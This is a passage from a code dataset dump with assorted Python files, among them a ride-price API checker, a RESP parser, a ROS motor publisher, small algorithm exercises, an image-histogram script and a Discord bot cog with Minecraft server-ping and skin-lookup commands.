datas\n self.response_raw = requests.post(self.url, data = json.dumps(datas), headers = self.header)\n self.response_json = json.loads(self.response_raw.text)\n \n def snapp_price_checker(self):\n print(self.response_raw)\n return self.response_json['prices'][0]['final']\n \n\n def tap30_price_checker(self):\n print(self.response_raw)\n return self.response_json['data']['serviceCategoriesInfo'][0]['priceInfos'][0]['price']\n ","sub_path":"ServiceRequest.py","file_name":"ServiceRequest.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"285810522","text":"class State:\n def __init__(self):\n self.length = 0\n self.done = False\n self.data = []\n\ndef readBulk(b):\n s = b.Buffer()\n i = s.find('\\n')\n if i == -1:\n return None\n\n length = int(s[1:i-1])\n headerlen = i + 1\n bodylen = length + 2\n if b.Len() < headerlen + bodylen:\n return None\n\n b.Skip(headerlen)\n s = b.Read(bodylen)\n return s[:-2]\n\ndef readMessage(b, stat):\n if b.Len() == 0:\n return stat\n\n if stat.length == 0:\n s = b.Buffer()\n i = s.find('\\n')\n if i == -1:\n return stat\n\n s1 = b.ReadUtil('\\n')\n length = int(s1[1:i-1])\n stat.length = length\n\n while True:\n elem = readBulk(b)\n if not elem:\n break\n stat.data.append(elem)\n if len(stat.data) == stat.length:\n stat.done = True\n break\n\n return stat\n\ndef writeMessage(s):\n if not s:\n return '$-1\\r\\n'\n return '+%s\\r\\n'%(s)\n","sub_path":"epoll/resp.py","file_name":"resp.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"91711687","text":"#! 
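readBulk in resp.py above parses a RESP bulk string by reading the $<length>\r\n header and then exactly length + 2 characters of payload. A self-contained version of that framing logic over a plain string (resp.py's Buffer class is replaced by simple slicing here):

def read_bulk(buf):
    # bulk string frame: $<length>\r\n<payload>\r\n
    # returns (value, chars_consumed), or None if the frame is incomplete
    newline = buf.find('\n')
    if newline == -1 or not buf.startswith('$'):
        return None
    length = int(buf[1:newline - 1])  # strip '$' and the trailing '\r'
    header_len = newline + 1
    body_len = length + 2             # payload plus its '\r\n' terminator
    if len(buf) < header_len + body_len:
        return None                   # wait for more data
    payload = buf[header_len:header_len + body_len]
    return payload[:-2], header_len + body_len

print(read_bulk('$5\r\nhello\r\n'))  # ('hello', 11)
print(read_bulk('$5\r\nhel'))        # None (incomplete frame)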
usr/bin python3\n\nimport sys\n\nimport numpy as np\nfrom math import pi\nimport rospy\nfrom sensor_msgs.msg import JointState\nfrom actionlib.simple_action_client import SimpleActionClient \nfrom control_msgs.msg import FollowJointTrajectoryAction, FollowJointTrajectoryGoal\nfrom rospy.topics import Message\nfrom trajectory_msgs.msg import JointTrajectory,JointTrajectoryPoint\n\nfrom std_msgs.msg import Header\n\n\n\nclass run_dynamixel:\n def __init__(self):\n \n self.joints_str = JointTrajectory()\n self.joints_str.header = Header()\n self.joints_str.header.stamp = rospy.Time.now()\n self.joints_str.joint_names = ['pan3','pan']\n self.point = JointTrajectoryPoint()\n l3 = pi/180 * np.array([\n [0,30,45,0,-30,-50,-10,0],\n [0,30,45,0,-30,-50,-10,0]\n ])\n for indx in range(len(l3[0, :])):\n point= JointTrajectoryPoint(positions= l3[:, indx],\n time_from_start= rospy.Duration(0 + 0.5*indx))\n self.joints_str.points.append(point)\n print(str(self.joints_str.points)+ '\\n')\n def pub_position(self,arg):\n pub = rospy.Publisher('/dynamixel_workbench/joint_trajectory',JointTrajectory,queue_size=1)\n pub.publish(self.joints_str)\n # rospy.loginfo(\"command invaito: %s\", self.joints_str)\n \n def listener(self):\n rospy.Subscriber('/dynamixel_workbench/joint_states',JointState,self.pub_position)\n\n\nif __name__ == '__main__':\n try:\n rospy.init_node('pub_to_motor')\n r1 = run_dynamixel()\n r1.listener()\n rospy.spin()\n except KeyboardInterrupt as ke:\n pass\n\n ","sub_path":"src/testing_trajec.py","file_name":"testing_trajec.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"499308443","text":"def twosum(nums, target):\n n = len(nums)\n for i in range(n):\n for j in range(i+1,n):\n if nums[i] + nums[j] == target:\n return [i,j]\n\ndef twosum_v2(nums, target):\n d = {}\n for i in range(len(nums)):\n val = target - nums[i]\n if val in d:\n return [d[val], i]\n else:\n d[nums[i]] = i\n\nif __name__ == '__main__':\n print(twosum_v2([2, 7, 11, 15],9))\n print(twosum([2, 7, 11, 15],9))","sub_path":"Leetcode/TwoSums.py","file_name":"TwoSums.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"423378062","text":"import numpy as np\nimport cv2\nfrom collections import defaultdict\nfrom mean_shift_by_CV import get_img_hist\n\nBIN_SIZE = 2\nBIN_COUNTS = 183\n\n\ndef getColorList():\n \"\"\"\n get the range of each color\n :return: a list\n \"\"\"\n dict = defaultdict(list)\n\n lower_black = np.array([0, 0, 0])\n upper_black = np.array([180, 255, 46])\n color_list = []\n color_list.append(lower_black)\n color_list.append(upper_black)\n dict['black'] = color_list\n\n lower_gray = np.array([0, 0, 46])\n upper_gray = np.array([180, 43, 220])\n color_list = []\n color_list.append(lower_gray)\n color_list.append(upper_gray)\n dict['gray']=color_list\n\n lower_white = np.array([0, 0, 221])\n upper_white = np.array([180, 30, 255])\n color_list = []\n color_list.append(lower_white)\n color_list.append(upper_white)\n dict['white'] = color_list\n\n lower_red = np.array([156, 43, 46])\n upper_red = np.array([180, 255, 255])\n color_list = []\n color_list.append(lower_red)\n color_list.append(upper_red)\n dict['red'] = color_list\n\n lower_red = np.array([0, 43, 46])\n upper_red = np.array([10, 255, 255])\n color_list = []\n color_list.append(lower_red)\n color_list.append(upper_red)\n dict['red2'] = color_list\n\n 
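twosum_v2 above replaces the O(n^2) double loop with a single pass that looks up each value's complement in a dictionary. The same idea extends naturally to counting all complement pairs (a sketch using collections.Counter, not part of the original file):

from collections import Counter

def count_pairs_with_sum(nums, target):
    # one pass: each value pairs with every previously seen complement
    seen = Counter()
    pairs = 0
    for value in nums:
        pairs += seen[target - value]
        seen[value] += 1
    return pairs

print(count_pairs_with_sum([2, 7, 11, 15, 7], 9))  # 2, since (2, 7) occurs twice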
lower_orange = np.array([11, 43, 46])\n upper_orange = np.array([25, 255, 255])\n color_list = []\n color_list.append(lower_orange)\n color_list.append(upper_orange)\n dict['orange'] = color_list\n\n lower_yellow = np.array([26, 43, 46])\n upper_yellow = np.array([34, 255, 255])\n color_list = []\n color_list.append(lower_yellow)\n color_list.append(upper_yellow)\n dict['yellow'] = color_list\n\n lower_green = np.array([35, 43, 46])\n upper_green = np.array([77, 255, 255])\n color_list = []\n color_list.append(lower_green)\n color_list.append(upper_green)\n dict['green'] = color_list\n\n lower_cyan = np.array([78, 43, 46])\n upper_cyan = np.array([99, 255, 255])\n color_list = []\n color_list.append(lower_cyan)\n color_list.append(upper_cyan)\n dict['cyan'] = color_list\n\n lower_blue = np.array([100, 43, 46])\n upper_blue = np.array([124, 255, 255])\n color_list = []\n color_list.append(lower_blue)\n color_list.append(upper_blue)\n dict['blue'] = color_list\n\n lower_purple = np.array([125, 43, 46])\n upper_purple = np.array([155, 255, 255])\n color_list = []\n color_list.append(lower_purple)\n color_list.append(upper_purple)\n dict['purple'] = color_list\n\n return dict\n\n\ndef hsv_to_bin(scale):\n \"\"\"\n 给定一个色块的色度, 计算他所属的bin, 例如:[0,10)属于bin(0), [10,20)属于bin(1)\n :param scale: 一个色块的值\n :return: 当前色块属于哪个bin\n \"\"\"\n name = ''\n flag = None\n h, s, v = scale\n if v <= 255*0.2:\n name = '黑色' # 底部是黑色\n flag = 180\n elif s <= 255*0.2: # 靠近柱中心是白色或灰色\n if 255*0.2< v <= 255*0.6: # 靠中间是灰色\n name = '灰色'\n flag = 181\n elif v > 255*0.6:\n name = '白色' # 靠上是白色\n flag = 182\n\n else: # 彩色\n hue = h//4 # (0-45)\n flag = hue\n\n if 255*0.2 < s <= 255 * 0.6: # 内层\n horizontal = 0\n elif s > 255 * 0.6: # 外层\n horizontal = 1\n flag += 45\n\n if v > 255*0.6: # 上层\n vertical = 3\n elif 255*0.2 < v <= 255*0.6: # 上层\n vertical = 3\n flag += 45\n\n\n name = str(hue)+'_'+str(horizontal)+'_'+str(vertical)\n\n return [name, flag]\n\n\ndef scale_to_bin(scale):\n \"\"\"\n 给定一个色块的色度, 计算他所属的bin, 例如:[0,10)属于bin(0), [10,20)属于bin(1)\n :param scale: 一个色块的值\n :return: 当前色块属于哪个bin\n \"\"\"\n\n b = np.mean(scale)//BIN_SIZE\n return b\n\n\ndef get_points_of_bin(img, bin_num):\n \"\"\"\n 根据给定图像, 计算属于某个bin的所有点的位置\n :param img: 给定图像\n :param bin_num: bin_num\n :return: 返回一个[n, 2]的列表, 包含所有属于某个bin的所有的点\n \"\"\"\n result = np.array(np.where(img == bin_num)).T\n return result\n\n\ndef compute_histogram(img):\n \"\"\"\n 给定target的图像, 计算q_u, 灰度值越高, 色块越白\n calculate the frequency of every bin(with weight)\n :param img: 给定\n :return:\n \"\"\"\n # img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n img_hsv = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n\n # get a kernel with weight\n kx = cv2.getGaussianKernel(img.shape[1], 3) # 行数(个数, sigma)\n ky = cv2.getGaussianKernel(img.shape[0], 3) # 列数\n kernel = np.matmul(kx, ky.T)\n kernel = np.ones([img.shape[1], img.shape[0]])\n\n # 计算每个bin的概率\n # calculate the frequency of every bin\n\n # 将图片转为bin图\n for x in range(img.shape[0]):\n for y in range(img.shape[1]):\n name, flag = hsv_to_bin(img_hsv[x][y])\n img[x][y] = flag\n\n q_u_list = np.array([])\n for bin_num in range(0, BIN_COUNTS):\n # 获得所有属于某个bin的所有点的坐标\n # get all point coordinate of one bin\n points_list = get_points_of_bin(img, bin_num)\n\n # calculate all the sum of all the points\n _sum = np.sum([kernel[x][y] for y, x in points_list])\n q_u_list = np.append(q_u_list, _sum)\n\n # normalize, make the sum 1\n # q_u_list = q_u_list/np.sum(q_u_list)\n\n return q_u_list\n\n\ndef 
compute_histogram1(img):\n \"\"\"\n 给定target的图像, 统计出现次数, 灰度值越高, 色块越白\n count the frequency of each bin\n :param img: 给定\n :return:\n \"\"\"\n # img1 = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n img = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n cv2.imshow('img', img)\n cv2.waitKey(0)\n cv2.destroyWindow('img')\n\n q_u_count_list = np.array([])\n for bin_num in range(0, BIN_COUNTS):\n # 获得所有属于某个bin的点的坐标\n points_list = get_points_of_bin(img, bin_num)\n\n count = len(points_list)\n q_u_count_list = np.append(q_u_count_list, count)\n\n q_u_count_list = q_u_count_list/np.sum(q_u_count_list)\n\n return q_u_count_list\n\n\nif __name__ == \"__main__\":\n\n img = cv2.imread('data/test1_1.png')\n hist = compute_histogram(img)\n # hist = compute_histogram_count(img)\n print(hist)\n\n # cv_hist = get_img_hist(img)\n # print(cv_hist.T)\n\n","sub_path":"calHistogram.py","file_name":"calHistogram.py","file_ext":"py","file_size_in_byte":6514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"501480503","text":"\"\"\"\n#1 assignment\ndef divisible(x, y):\n\tif x % y == 0:\n\t\treturn True\n\telse:\n\t\treturn False\n\"\"\"\n\"\"\"\n#2 assignment\ndef cent_change(cents):\n\tdollars = cents // 100\n\ta = cents % 100\n\tquarters = a // 25\n\tb = a % 25\n\tdimes = b // 10\n\tc = b % 10\n\tnickels = c // 5\n\td = c % 5\n\tpennies = d\n\"\"\"\n\"\"\"\n#3 assignment\ndef fibonacci():\n\ta = 0\n\tb = 1\n\tfor i in range(1, 20):\n\t\tc = a + b\n\t\ta = b\n\t\tb = c\n\t\tprint(a)\t\t\nfibonacci()\n\"\"\"\n\n#4 assignment\ndef int_check(user_input):\n\twhile True:\n\t\tif user_input.isdigit():\n\t\t\treturn(int(user_input))\n\t\telse:\n\t\t\tuser_input = input(\"This is not a numeral value for your input. Try again. \")\n\n\ndef factorial(number):\n\ta = number\n\tb = number - 1\n\tfor cat in range(1, number):\n\t\tc = a * b\n\t\ta = c\n\t\tb = b - 1\n\treturn(a)\n\t\n\ndef calculating_e():\n\ta = 1\n\tfor yowl in range(1, 20):\n\t\ta += 1 / factorial(yowl)\n\treturn(a)\n\n\npurr = input(\"Input a number. 
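getColorList above pairs each named color with lower/upper HSV bounds; the usual way to apply such a pair is cv2.inRange, which yields a binary mask whose nonzero count measures that color's pixel coverage. A sketch assuming opencv-python is installed (synthetic image, so nothing is read from disk); note that cv2.imread returns BGR, so COLOR_BGR2HSV is the conversion that matches these named ranges:

import cv2
import numpy as np

# a 10x10 pure-red BGR image instead of a file from disk
img = np.zeros((10, 10, 3), dtype=np.uint8)
img[:, :] = (0, 0, 255)

hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
lower_red = np.array([0, 43, 46])
upper_red = np.array([10, 255, 255])

mask = cv2.inRange(hsv, lower_red, upper_red)  # 255 where the pixel falls in range
print('red pixels:', cv2.countNonZero(mask))   # 100 for this synthetic image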
\")\nmeow = int_check(purr)\nprint(factorial(meow))\nprint(calculating_e())\n","sub_path":"optional_assignments.py","file_name":"optional_assignments.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"537598415","text":"from discord.ext import commands\nimport discord\nfrom mcstatus import MinecraftServer\nimport socket\nfrom pyraklib.protocol.EncapsulatedPacket import EncapsulatedPacket\nfrom pyraklib.protocol.UNCONNECTED_PING import UNCONNECTED_PING\nfrom pyraklib.protocol.UNCONNECTED_PONG import UNCONNECTED_PONG\nimport aiohttp\nimport base64\nimport json\nimport asyncio\nfrom random import choice\n\n\nclass Minecraft(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n\n self.ses = aiohttp.ClientSession()\n\n self.g = self.bot.get_cog(\"Global\")\n\n self.first = [\"Hey, you should build\", \"Hey, what if you made\", \"Hey, you should build\", \"What if you built\", \"What if you made\", \"You could create\", \"What if you created\", \"You could make\"]\n self.prenouns = [\"a statue of a creeper\", \"a cozy home with a fireplace\", \"a secret redstone base\", \"a statue of Steve\", \"a command block creation\", \"a replica of the Statue of Liberty\",\n \"a replica of the world\", \"a statue of Alex\", \"a statue of Steve & Alex\", \"a hidden base\", \"a secret room in your house\", \"a 2x1 redstone door\", \"a 2x2 redstone door\",\n \"a 2x3 redstone door\", \"a 3x3 redstone door\", \"a flying machine\", \"a working fireplace\", \"a mansion\", \"a haunted mansion\", \"a server lobby\", \"a golf course\", \"a pirate ship\",\n \"an awesome parkour map\", \"an adventure map\", \"a cool statue of your skin\", \"a realistic model of your house\", \"pixel art of Pikachu\", \"pixel art\", \"a pvp arena\",\n \"something, idk\", \"a recreation of a meme\", \"an animation with command blocks\", \"a pvp map\", \"a dropper map\", \"a lovely survival world\", \"a giant hotel\",\n \"pixel art of Villager Bot\", \"pixel art of emeralds\", \"a giant survival base\", \"a siege-ready castle\", \"a castle and lava moat\", \"a giant tree house\", \"a giant palace\",\n \"a throne fit for a king\", \"a prison\", \"pixel art of you\", \"a statue of a sheep\", \"a statue of a cow\", \"a statue of your stuffed animal\", \"a replica of your pet\"\n \"a city block\", \"an emerald bank\", \"a fishing hole\", \"a 3 story tree house\", \"a cactus farm\", \"a wheat farm\", \"a carrot farm\", \"a floating village\", \"an auto farm\",\n \"a giant farm\", \"an igloo\", \"a sky island\", \"a giant maze\", \"a toy shop\", \"a mall\", \"a swimming pool\", \"a town hall\", \"a villager breeding machine\", \"a tree farm\",\n \"an underground garden\", \"the flag of your home country\", \"a witch farm\", \"a giant public library\", \"a storage room\", \"a bakery\", \"a mob arena\", \"a maze with deadly traps\",\n \"a mad science labratory\", \"a large volcano\", \"a dog house\", \"a cat house\", \"a city park\", \"a pacman game\", \"a tnt cannon\", \"a space ship that can fire tnt\", \"a giant cake\",\n \"a theme park\", \"a carnival\", \"a drowned farm\", \"a blacksmith\", \"a kelp farm\", \"a tavern\", \"a monorail\", \"a refugee center\", \"an escape room\", \"a greenhouse with plants\",\n \"a giant slime-block trampoline\", \"a miniature city\", \"a satellite dish\", \"an elven city\", \"an egyptian pyramid\", \"a skate park\", \"a circus\", \"the Minecraft olympics\",\n \"a redstone computer\", \"your favorite 
cartoon characters\", \"an ultra auth-sorting storage system\", \"a giant tnt cannon\", \"a player launcher\", \"a small town\", \"a bamboo farm\",\n \"a farm\", \"a small hut\", \"a gaming computer\", \"an x-wing fighter from Star Wars\", \"a super-big rainbow with a pot of gold at the end\", \"giant versions of blocks\", \"a meatbal\",\n \"a computer\", \"a 20 story apartment building\", \"a hospital\", \"a zombie villager curing hospital\", \"a school\", \"a viking ship\", \"a viking village\", \"some tennis courts\",\n \"a massive mine\", \"a helicopter pad\", \"a secret FBI base\", \"a secret CIA base\", \"Area 51\", \"a giant sea monster\", \"a massive cruise ship\", \"a planet\" \"the solar system\",\n \"a massive abandoned mineshaft\", \"the kraken\", \"a seafood resturant\", \"a resturant that only serves various forms of fried octopus tentacles\", \"a massive trampoline park\",\n \"a statue of a bee\", \"a giant dragon\", \"a rainbow-colored dragon\", \"a hidden enchanting table station\", \"a redstone drawbridge\", \"a dump truck\", \"a dinosaur\",\n \"a construction site\", \"a skyscraper\", \"an iPhone\", \"a humble abode\", \"a river\", \"a hobbit hole\", \"a home in a volcano\", \"a disco\", \"a creepy campsite\", \"an awesome jungle\"]\n \n self.nouns = [\"creeper\", \"cozy room with a fireplace\", \"cozy house\", \"Steve\", \"Alex\", \"your skin\", \"your favorite cartoon character\", \"pixel art of your Minecraft skin\", \"Minecraft in Minecraft\",\n \"command block creation\", \"replica of the Statue of Liberty\", \"replica of the world\", \"statue of Steve & Alex\", \"statue of your favorite stuffed animal\", \"cruise ship\",\n \"dinosaur\", \"bee\", \"survival base\", \"castle\", \"castle with a moat\", \"blacksmithery\", \"bakery\", \"x-wing fighter\", \"area 51\", \"redstone drawbridge\", \"dump truck\", \"tennis courts\",\n \"model of a solar system\", \"dog house\", \"villager\", \"statue of a villager\", \"giant sea monster\", \"viking ship\", \"carrot farm\", \"player launcher\", \"tnt cannon\", \"pacman pixel art\",\n \"tree house\", \"tree farm\", \"floating village\", \"town hall\", \"storage room\", \"mall\", \"swimming pool\", \"monorail\", \"mansion\", \"fireplace\", \"hidden room\", \"survival world\", \"hotel\",\n \"throne room\", \"throne for a king\", \"sky island\", \"volcano\", \"hospital\", \"CIA base\", \"hobbit hole\", \"mountain\", \"river\", \"winding river\", \"hydroelectric dam\", \"power plant\",\n \"labratory\", \"mad science labratory\", \"skyscraper\", \"dragon\", \"resturant\", \"helicopter pad\", \"helicopter\", \"vehicle\", \"trampoline\", \"trampoline park\", \"town\", \"farm\", \"PvP arena\",\n \"dropper map\", \"PvE arena\", \"kraken\", \"phone\", \"smart phone\", \"public library\", \"secret library\", \"toy shop\", \"maze\", \"winding maze\", \"underground garden\", \"emerald bank\",\n \"golf course\", \"tavern\", \"road\", \"super-highway\", \"home\", \"mob arena\", \"arena\", \"city park\", \"playground\", \"octopus\", \"rabbit\", \"dog\", \"cat\", \"sheep\", \"cow\", \"camel\", \"pig\",\n \"wandering villager\", \"villager\", \"wither\", \"ender dragon\", \"statue of a wither\", \"statue of an ender dragon\", \"statue of an octopus\", \"statue of a dog\", \"palace\", \"pyramid\",\n \"egyptian tomb\", \"theme park\", \"computer\", \"adventure map\", \"moat\", \"pirate ship\", \"cruise-liner\", \"carrot\", \"hidden enchanting table station\", \"skate park\", \"virus\", \"camp site\",\n \"iPhone\", \"T.V.\", \"apartment building\", 
\"mineshaft\", \"gaming computer\", \"bakery\"]\n self.colors = [\"red-colored\", \"orange-colored\", \"yellow-colored\", \"green-colored\", \"blue-colored\", \"indigo-colored\", \"violet-colored\", \"grey\", \"black\", \"purple\", \"white\", \"brown\"]\n self.sizes = [\"normal sized\", \"normally sized\", \"large\", \"massive\", \"huge\", \"gigantic\", \"tiny\", \"small\", \"microscopic\", \"normal sized\"]\n\n def cog_unload(self):\n self.bot.loop.create_task(self.stop_ses())\n\n async def stop_ses(self):\n await self.ses.stop()\n\n @commands.command(name=\"mcping\") # Pings a java edition minecraft server\n async def mc_ping(self, ctx, *, server: str):\n await ctx.trigger_typing()\n server = server.replace(\" \", \"\")\n if \":\" in server:\n s = server.split(\":\")\n try:\n int(s[1])\n except Exception:\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=\"**\"+server+\"** is either offline or unavailable at the moment.\\n\" +\n \"Did you type the ip and port correctly? (Like ip:port)\\n\\nExample: ``\"+ctx.prefix+\"mcping 172.10.17.177:25565``\"))\n return\n if server == \"\":\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=\"You must specify a server to ping!\"))\n return\n status = MinecraftServer.lookup(server)\n try:\n status = status.status()\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=server+\" is online with {0} player(s) and a ping of {1} ms.\".format(status.players.online, status.latency)))\n except Exception:\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=\"**\"+server+\"** is either offline or unavailable at the moment.\\n\" +\n \"Did you type the ip and port correctly? (Like ip:port)\\n\\nExample: ``\"+ctx.prefix+\"mcping 172.10.17.177:25565``\"))\n\n @commands.command(name=\"mcpeping\", aliases=[\"mcbeping\"])\n async def bedrock_ping(self, ctx, server: str):\n ping = UNCONNECTED_PING()\n ping.pingID = 4201\n ping.encode()\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.setblocking(0)\n try:\n s.sendto(ping.buffer, (socket.gethostbyname(server), 19132))\n await asyncio.sleep(.75)\n recvData = s.recvfrom(2048)\n except BlockingIOError:\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=\"**\"+server+\"** is either offline or unavailable at the moment. Did you type the ip correctly?\"))\n return\n except socket.gaierror:\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=\"**\"+server+\"** is either offline or unavailable at the moment. 
Did you type the ip correctly?\"))\n return\n pong = UNCONNECTED_PONG()\n pong.buffer = recvData[0]\n pong.decode()\n sInfo = str(pong.serverName)[2:-2].split(\";\")\n pCount = sInfo[4]\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=server+\" is online with \"+pCount+\" player(s).\"))\n\n @commands.command(name=\"stealskin\", aliases=[\"skinsteal\", \"skin\"])\n @commands.cooldown(1, 2.5, commands.BucketType.user)\n async def skinner(self, ctx, *, gamertag: str):\n response = await self.ses.get(\"https://api.mojang.com/users/profiles/minecraft/\"+gamertag)\n if response.status == 204:\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=\"That player doesn't exist!\"))\n return\n uuid = json.loads(await response.text())[\"id\"]\n response = await self.ses.get(\"https://sessionserver.mojang.com/session/minecraft/profile/\"+str(uuid)+\"?unsigned=false\")\n content = json.loads(await response.text())\n if \"error\" in content:\n if content[\"error\"] == \"TooManyRequestsException\":\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=\"Hey! Slow down!\"))\n return\n undec = base64.b64decode(content[\"properties\"][0][\"value\"])\n try:\n url = json.loads(undec)[\"textures\"][\"SKIN\"][\"url\"]\n except Exception:\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=\"An error occurred while fetching that skin!\"))\n return\n skinEmbed = discord.Embed(color=discord.Color.green(), description=gamertag+\"'s skin\\n[**[Download]**](\"+url+\")\")\n skinEmbed.set_thumbnail(url=url)\n skinEmbed.set_image(url=\"https://mc-heads.net/body/\"+gamertag)\n await ctx.send(embed=skinEmbed)\n\n @commands.command(name=\"nametouuid\", aliases=[\"uuid\", \"getuuid\"])\n @commands.cooldown(1, 1, commands.BucketType.user)\n async def get_uuid(self, ctx, *, gamertag: str):\n r = await self.ses.post(\"https://api.mojang.com/profiles/minecraft\", json=[gamertag])\n j = json.loads(await r.text()) # [0]['id']\n if j == []:\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=\"That user could not be found.\"))\n return\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=f\"{gamertag}: ``{j[0]['id']}``\"))\n\n @commands.command(name=\"uuidtoname\", aliases=[\"getgamertag\"])\n @commands.cooldown(1, 1, commands.BucketType.user)\n async def get_gamertag(self, ctx, *, uuid: str):\n response = await self.ses.get(f\"https://api.mojang.com/user/profiles/{uuid}/names\")\n if response.status == 204:\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=\"That player doesn't exist!\"))\n return\n j = json.loads(await response.text())\n name = j[len(j)-1][\"name\"]\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=f\"{uuid}: ``{name}``\"))\n\n @commands.command(name=\"mcsales\", aliases=[\"minecraftsales\"])\n @commands.cooldown(1, 1, commands.BucketType.user)\n async def mc_sales(self, ctx):\n r = await self.ses.post(\"https://api.mojang.com/orders/statistics\", json={\"metricKeys\": [\"item_sold_minecraft\", \"prepaid_card_redeemed_minecraft\"]})\n j = json.loads(await r.text())\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=f\"**{j['total']}** total Minecraft copies sold, **{round(j['saleVelocityPerSeconds'], 3)}** copies sold per second.\"))\n\n @commands.command(name=\"randomserver\", aliases=[\"randommc\", \"randommcserver\", \"mcserver\", \"minecraftserver\"])\n async def 
random_mc_server(self, ctx):\n s = choice(self.g.mcServers)\n try:\n online = MinecraftServer.lookup(s['ip']+\":\"+str(s['port'])).status()\n stat = \"<:online:692764696075304960>\"\n except Exception:\n stat = \"<:offline:692764696431951872>\"\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=f\"{stat} \\uFEFF ``{s['ip']}:{s['port']}`` {s['version']} ({s['type']})\\n{s['note']}\"))\n\n @commands.command(name=\"buildidea\", aliases=[\"idea\"])\n async def build_idea(self, ctx):\n if choice([True, False]):\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=f\"{choice(self.first)} {choice(self.prenouns)}{choice(['!', ''])}\"))\n else:\n await ctx.send(embed=discord.Embed(color=discord.Color.green(), description=f\"{choice(self.first)} a {choice(self.sizes)}, {choice(self.colors)} {choice(self.nouns)}{choice(['!', ''])}\"))\n\n @commands.command(name=\"colorcodes\", aliases=[\"mccolorcodes\", \"colors\", \"cc\"])\n async def mc_color_codes(self, ctx):\n embed = discord.Embed(color=discord.Color.green(), description=\"Text in Minecraft can be formatted using different codes and\\nthe section (``§``) sign.\")\n embed.set_author(name=\"Minecraft Formatting Codes\")\n embed.add_field(name=\"Color Codes\", value=\"<:red:697541699706028083> **Red** ``§c``\\n\"\n \"<:yellow:697541699743776808> **Yellow** ``§e``\\n\"\n \"<:green:697541699316219967> **Green** ``§a``\\n\"\n \"<:aqua:697541699173613750> **Aqua** ``§b``\\n\"\n \"<:blue:697541699655696787> **Blue** ``§9``\\n\"\n \"<:light_purple:697541699546775612> **Light Purple** ``§d``\\n\"\n \"<:white:697541699785719838> **White** ``§f``\\n\"\n \"<:gray:697541699534061630> **Gray** ``§7``\\n\")\n embed.add_field(name=\"Color Codes\", value=\"<:dark_red:697541699488055426> **Dark Red** ``§4``\\n\"\n \"<:gold:697541699639050382> **Gold** ``§6``\\n\"\n \"<:dark_green:697541699500769420> **Dark Green** ``§2``\\n\"\n \"<:dark_aqua:697541699475472436> **Dark Aqua** ``§3``\\n\"\n \"<:dark_blue:697541699488055437> **Dark Blue** ``§1``\\n\"\n \"<:dark_purple:697541699437592666> **Dark Purple** ``§5``\\n\"\n \"<:dark_gray:697541699471278120> **Dark Gray** ``§8``\\n\"\n \"<:black:697541699496444025> **Black** ``§0``\\n\")\n embed.add_field(name=\"Formatting Codes\", value=\"<:bold:697541699488186419> **Bold** ``§l``\\n\"\n \"<:strikethrough:697541699768942711> ~~Strikethrough~~ ``§m``\\n\"\n \"<:underline:697541699806953583> __Underline__ ``§n``\\n\"\n \"<:italic:697541699152379995> *Italic* ``§o``\\n\"\n \"<:obfuscated:697541699769204736> ||Obfuscated|| ``§k``\\n\"\n \"<:reset:697541699697639446> Reset ``§r``\\n\")\n await ctx.send(embed=embed)\n\n\n\ndef setup(bot):\n bot.add_cog(Minecraft(bot))\n","sub_path":"cogs/commands/mc.py","file_name":"mc.py","file_ext":"py","file_size_in_byte":16684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"362898657","text":"from typing import Any, Callable, Iterable, Optional, Tuple, Union\n\nimport dask.array as da\nimport numpy as np\nfrom xarray import Dataset\n\nfrom sgkit.utils import conditional_merge_datasets\nfrom sgkit.variables import window_contig, window_start, window_stop\n\nfrom .typing import ArrayLike, DType\n\n# Window definition (user code)\n\n\ndef window(\n ds: Dataset,\n size: int,\n step: Optional[int] = None,\n merge: bool = True,\n) -> Dataset:\n \"\"\"Add fixed-size windowing information to a dataset.\n\n Windows are defined over the ``variants`` dimension, and are\n used by some downstream 
